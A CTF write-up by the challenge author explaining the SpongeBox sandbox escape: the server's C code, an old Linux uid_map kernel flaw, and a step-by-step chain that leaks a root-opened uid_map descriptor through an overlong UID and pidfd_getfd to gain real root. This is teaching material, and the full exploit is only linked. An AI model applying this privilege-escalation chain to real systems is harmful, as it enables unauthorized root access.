SpongeBox - Bringing Linux Logical Vulnerabilities Back To Life - BlueWater CTF 2024
Author: Jonathan Jacobi (@j0nathanj).
SpongeBox is a Linux-based sandbox escape challenge from Blue Water CTF 2024.
The original motivation for this challenge were actually some old Linux kernel vulnerabilities and interesting behaviors around them - which together ended up as a really nice CTF challenge.
The relevant files for the challenge can be found here (SpongeBob.tar.gz was handed out).
There is a /flag
file that is readable only by root. The challenge is initially spawned as root.
The Challenge
The layout of the challenge is pretty simple: a server (written in C) that listens for connections and supports 3 possible commands:
-
Creating a sandbox and running an ELF binary.
-
Connecting to a sandbox: The Sandboxee should set
stdin
/stdout
as FDs that are going to be used by the Sandboxer, in a way that the Sandboxee canread()
fromstdin
data that the Sandboxer sent, andwrite()
tostdout
data that the Sandboxer will receive. -
Communicating with the sandbox: This will
write()
into thestdin
FD of the Sandboxee to allow this data to be read inside the Sandbox. It will alsoread()
data from thestdout
that was set up for the Sandboxee and send back the result.
This whole behavior essentially mimics the ability to set up a sandbox, run a binary inside of it, communicate with it, and get the results.
1. CMD_CREATE
- Creating a Sandbox 🆕
This function creates a new sandboxed process, and receives the contents of an ELF file that will be executed from within the sandbox.
The sandboxer creates a new sandboxee process, with all possible new namespaces. The sandbox creation is done by a “weak” user (non-root).
The sandbox creation also creates a socketpair()
and shares it with the sandboxee, to be able to sync with it. Specifically, to allow the sandboxer to FIRST map the uid & gid of the new user namespace, before the sandboxee tries to setuid()
.
1
2
3
4
5
6
7
8
9
10
11
12
13
int create_sandbox(sandbox_args_t *args) {
// ...
// Create a socketpair for synchronization
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_socket) == -1) {
perror("socketpair");
munmap(stack, STACK_SIZE);
return -1;
}
// Drop privileges before creating the sandboxee
drop_privileges();
child_pid = clone(run_sandbox, stackTop, CLONE_NEWPID | CLONE_NEWNET | CLONE_NEWUTS |CLONE_NEWCGROUP | CLONE_NEWIPC | CLONE_NEWNS | CLONE_NEWUSER | SIGCHLD, args);
The call to drop_privileges()
essentially means that the owning user of the new user namespace created, is a non-root one.
1
2
3
4
5
6
7
8
9
10
11
void drop_privileges(void) {
if (setegid(DEFAULT_GID) != 0) {
perror("setegid failed in drop_privileges");
exit(-1);
}
if (seteuid(DEFAULT_UID) != 0) {
perror("seteuid failed in drop_privileges");
exit(-1);
}
}
And, there’s additional synchronization with the child for the mapping purposes, as can be seen:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int create_sandbox(sandbox_args_t *args) {
// ...
// ...
child_pid = clone(run_sandbox, stackTop, CLONE_NEWPID | CLONE_NEWNET | CLONE_NEWUTS |CLONE_NEWCGROUP | CLONE_NEWIPC | CLONE_NEWNS | CLONE_NEWUSER | SIGCHLD, args);
// Gain capabilities to continue the sandboxer
gain_privileges();
// ...
// Parent process: set up UID/GID mappings for the child
deny_setgroups(child_pid);
setup_idmaps(child_pid, args->uid, args->gid);
// Signal the child that UID/GID mappings are set up
if (write(sync_socket[0], "x", 1) != 1) {
perror("Failed to write to sync socket");
}
// ...
}
An interesting thing to note here, is that both the uid
and the gid
that are used as the inner uid
and gid
inside the sandbox - are strings (yes, verified properly to be all digits…) controlled remotely.
This in itself is not a security issue, as those are the ids inside the sandbox - and they can be arbitrary values.
Sandbox creation - run_sandbox()
This function is the entry point for the sandboxee. It essentially sets up the sandbox, and then execveat()
-s the ELF memfd created earlier.
1
2
3
4
5
6
7
8
9
10
11
void run_sandbox(sandbox_args_t *args) {
// Close the parent's end of the sync socket
close(sync_socket[0]);
PCHECK(setup_sandbox(args->uid, args->gid) == 0, "setup_sandbox failed");
// Close the child's end of the sync socket
close(sync_socket[1]);
execveat(args->fd, "", NULL, NULL, AT_EMPTY_PATH);
PCHECK(false, "execveat failed");
}
The setup_sandbox()
logic is also pretty simple. Simply calls setresgid()
and setresuid()
for the inner-uids, after it receives the signal from the sandboxer that the uid and the gid are now mapped.
Let’s take a look at it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static int setup_sandbox(char *uid, char *gid) {
char sync_char = '\x00';
uid_t uid_num = 0;
gid_t gid_num = 0;
// Wait for parent to set up UID/GID mappings and setgroup configuration
if (read(sync_socket[1], &sync_char, 1) != 1) {
FAIL("Failed to read from sync socket");
}
uid_num = atoi(uid);
gid_num = atoi(gid);
// Set the newly mapped user and group ids
become_user_group(uid_num, gid_num);
return 0;
}
And, the become_user_group
function, is also pretty simple:
1
2
3
4
5
void become_user_group(uid_t uid, gid_t gid) {
// Switch to the newly mapped user and group
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
}
💡 Primitive #1: Lack of return value check of setresuid()
and setresgid()
Those 2 function calls do not check any return values. Meaning, if the set-logic does not work, well.. nothing too special happens.
This behavior is not very interesting on its own, but let’s keep that in the back of our minds. It will be useful later.
Sandbox creation - setup_idmaps()
The other interesting function to examine is setup_idmaps()
, responsible for mapping the uid
and gid
provided, into the newly created user namespace.
The supplied uid
and gid
parameters are controlled remotely, and those are the IDs inside the sandbox.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
void setup_idmaps(pid_t pid, char *uid, char *gid) {
int uid_map_fd = -1, gid_map_fd = -1;
char *uid_map = NULL, *gid_map = NULL;
char *uid_map_path = NULL, *gid_map_path = NULL;
// Open the uid_map file
asprintf(&uid_map_path, "/proc/%d/uid_map", pid);
uid_map_fd = open(uid_map_path, O_WRONLY);
// Write the mapping
asprintf(&uid_map, "%s %d 1", uid, DEFAULT_UID);
write(uid_map_fd, uid_map, strlen(uid_map) + 1);
// Open the gid_map file
asprintf(&gid_map_path, "/proc/%d/gid_map", pid);
gid_map_fd = open(gid_map_path, O_WRONLY);
// Write the mapping
asprintf(&gid_map, "%s %d 1", gid, DEFAULT_GID);
write(gid_map_fd, gid_map, strlen(gid_map) + 1);
}
💡 Primitives #2 + #3: UID/GID Maps setups trickeries
Clearly there are a few more interesting things here as well:
- 💡 Primitive #2: No return value checks for writing to the uid and gid maps.
- 💡 Primitive #3: The
uid_map
andgid_map
FDs are left open and leaked. In most cases this is not useful, as writing touid_map
andgid_map
is possible only once (A kernel-level check).
Given those 2 primitives, one can wonder - can we get the write()
to the uid_map
to fail, and somehow leak an FD to a yet-to-be-written uid_map
? Why does this even help us?
🛑 A Linux Kernel History Lesson!
A very intereting observation about the uid_map
is that different users can write different contents to the file, but everyone can open it.
This is somewhat unusual, as we’re used to either being able to write to a file, or not - based on the file’s permissions. We’re less used to permission checks conducted upon write()
.
The case of uid_map
is that there IS a check upon write()
, and it allows different things for different writers.
An interesting question comes up - what if we open()
the uid_map
and inherit it as an stdout
/stderr
FD to a privileged process? For example - by execve()
-ing a suid binary?
Specifically, we can exec sudo
and also change argv[0]
to be an arbitrary content, and if we fail with an incorrect password we can cause a partially controlled write()
to that FD, by a privileged process!
- It usually writes
sudo: 3 incorrect password attempts
or something around that.sudo
is actuallyargv[0]
- so if we change that, we have a partially controlledwrite()
.
We can make that a more precise write, by coming up with creative primitives like ulimit()
-s. But you get the idea…
So is that going to work…?
Almost… but more permission checks 😔
Turns out that for a short while, this was an actual vulnerability!
The way the kernel deverloeprs solved it is by ALSO recording the permissions of the OPENER of the file - and during the write()
there is a check that verifies that both the opener and the writer have the correct permissions (CAP_SYS_ADMIN
in the target user namespace).
⏩ Going back to the challenge: Leaking the uid_map
fd
So if you recall, we were wondering if it would even be interesting to leak the uid_map
FD - and we just found out that IT IS INTERESTING, and that is because the OPENER of the uid_map
in setup_idmaps()
is a privileged (root) process!
The next logical question is… can we even leak the uid_map
fd?
💡 Primitive #4: Leaking the FD!
Well, we need to get the write()
to fail, as writing to the uid_map
is allowed only once (that makes sense too, the kernel devs don’t want race conditions around ids…).
Let’s take a look at how the write()
handler for uid_map
is implemented in the Linux Kernel source code.
This is actually implemented inside /kernel/user_namespace.c
under map_write()
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static ssize_t map_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos,
int cap_setid,
struct uid_gid_map *map,
struct uid_gid_map *parent_map)
{
// ...
char *kbuf, *pos, *next_line;
/* Only allow < page size writes at the beginning of the file */
if ((*ppos != 0) || (count >= PAGE_SIZE))
return -EINVAL;
// ...
/* Only allow one successful write to the map */
if (map->nr_extents != 0)
goto out;
We immediately notice the check that allows for only 1 successful write to uid_map
.
We also immediately see a FAIL FAST check in the beginning - that requires:
- The
write()
to not belseek()
-ed before (the check withppos
). - The amount of bytes that are going to be written to the
uid_map
to be less thanPAGE_SIZE
(4096).
Well, we can’t cause an lseek()
- but… remember we remotely control the uid
(as a string!) of the inner user namespace?
💡 Primitive #5: Leaking a privileged open()
-ed & non write()
-ten FD to a uid_map
Combining those points together, we can come up with the following idea!
The handler for CMD_CREATE
indeed checks the uid
is a digit-only string, but it can also be up to 4096
(MAX_STRING_SIZE
) bytes long, which means that together as a whole – the string written to the uid_map
is longer than 4096 bytes, and we can make write()
fail!
This is how the handler looks like in main()
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
if ((bytes_read != sizeof(uid_size)) ||
(uid_size >= MAX_STRING_SIZE)) {
send_error(1, "Failed to receive UID size");
break;
}
bytes_read = read(0, uid, uid_size);
if (bytes_read != uid_size) {
send_error(1, "Failed to receive UID");
break;
}
uid[uid_size] = '\0'; // Ensure null-termination
// Verify this is an actual number
if (!is_valid_number(uid)) {
send_error(1, "Invalid UID");
break;
}
It can clearly be seen that we can pass up to MAX_STRING_SIZE
digits, which is more than enough!
📋 Primitives so far!
Using primitive #2, #3 and #4 - we can finally achieve #5, which is:
Having a leaked uid_map
FD in the Sandboxer process, that is open()
-ed by a privileged process, and not write()
-ten into.
Also utilizing primtiive #1 - it means that the setresuid()
and setresgid()
that happen in the SANBOXED process, that exists there in order to become the desired UID/GID inside the sandbox, will fail.
It will fail because the mapping did not ACTUALLY take place, so changing to an inner UID will not work as it is not mapped. BUT this is not going to make any difference as the retun value is ignored, as seen in primitive #1!
This is enough from CMD_CREATE
, but we definitely found some very interesting behaviors.
2. CMD_CONNECT
: Connecting to the sandbox 🔗
This logic is very simple. Simply grabbing the fd = 0
and fd = 1
of a sandboxee (based on a sandbox id), using pidfd_getfd()
- and saving it in the struct that represents the sandbox.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
int connect_sandbox(sandbox_t *sandbox) {
// ...
// Open a file descriptor to the sandbox process
pidfd = syscall(SYS_pidfd_open, sandbox->pid, 0);
if (pidfd == -1) {
printf("pidfd_open failed\n");
goto cleanup;
}
// Get file descriptor (stdin) from the sandbox process
stdin_fd = syscall(SYS_pidfd_getfd, pidfd, STDIN, 0);
if (stdin_fd == -1) {
printf("pidfd_getfd failed for stdin with err %s\n", strerror(errno));
goto cleanup;
}
// Get file descriptor 1 (stdout) from the sandbox process
stdout_fd = syscall(SYS_pidfd_getfd, pidfd, STDOUT, 0);
if (stdout_fd == -1) {
printf("pidfd_getfd failed for stdout with err %s\n", strerror(errno));
goto cleanup;
}
sandbox->stdin_fd = stdin_fd;
sandbox->stdout_fd = stdout_fd;
// ...
Pretty simple stuff.
💡 Primitive #6: Actually receiving a leaked uid_map
fd in a Sandboxee
Once we leak an FD in the Sandboxer, we can create yet another Sandbox, and it will be spawned with a leaked uid_map
fd as we descrbied above!
3. CMD_COMMUNICATE
- Communicating with the sandbox 💬
This logic is also very trivial. Simply writing to the stdin
FD that was grabbed in the CMD_CONNECT
phase, and reading from stdout
(yes, those are the right operations – the stdout
is actually where the sanboxee writes, so we’re reading from it. And the other way around with stdin
).
💡 Primitive #7: Writing to the uid_map
from a privileged process!
Recall that we managed to leak the uid_map
fd to the sandboxee. Also, that same FD has not been written into, and it is open()
-ed by root.
Meaning, we just need to write to it from a privileged process, as seen before in the kernel checks.
Given the fact that the sandboxer can “steal” stdin
and stdout
- the Sandboxee can dup2()
the leaked FD into the FD that the Sandboxer is going to steal & write into (stdin
, fd == 0).
This KEEPS the permissions of the opener to be the original opener (thanks to pidfd_getfd()
), which is root.
This works! We have an FD to a uid_map
, that hasn’t been written into yet, and is also opened by a privileged process + going to be written-into by a (controlled) privileged process.
Now the only thing that’s left is writing WHATEVER WE WANT into the uid_map
, and that’s going to be permitted!
Chaining it all together! 🔗 💣
Summarizing it all together, the attack would look like this:
-
Create the first sandboxee + make the UID be
4095 * '0'
which will cause thewrite()
to theuid_map
to fail, and leak the FD in the sandboxer. -
The first sandboxee will execute our custom binary that will
sleep()
a bit :) -
Now create a second sandboxee. Make the creation work.
-
The second sandboxee has the
uid_map
of the first sandboxee leaked into it, as fd == 6 (leaked). -
In the second sandboxee,
dup2()
the fd == 6 into fd == 0 (stdin
). -
Trigger
CMD_CONNECT
with the second sandboxee, which will grab theuid_map
fd into the sandboxer. -
Call
CMD_COMMUNICATE
with the second sandboxee, and write'0 0 1'
to it, which will map the real UID == 0 into UID == 0 inside the FIRST SANDBOXEE (thanks to the leaked FD). -
Inside the first sandboxee, we’re now privileged and we can
setuid(0)
which will give us a REAL ROOT PRIVILEGE. -
From the first sandboxee, just read the flag file, and using
CMD_COMMUNICATE
leak it outside. -
Profit :)
The full exploit can be found here - it is composed of a Python script that interacts with the server, two c
files and the binaries built from them, that are used as the sandoxees.
Summary 🏁
I had a lot of fun writing this challenge, especially as it involved chaining multiple logical issues together into something that is not so trivial to think of.
I hope you enjoyed the walkthrough, and feel free to reach out to me on X @j0nathanj!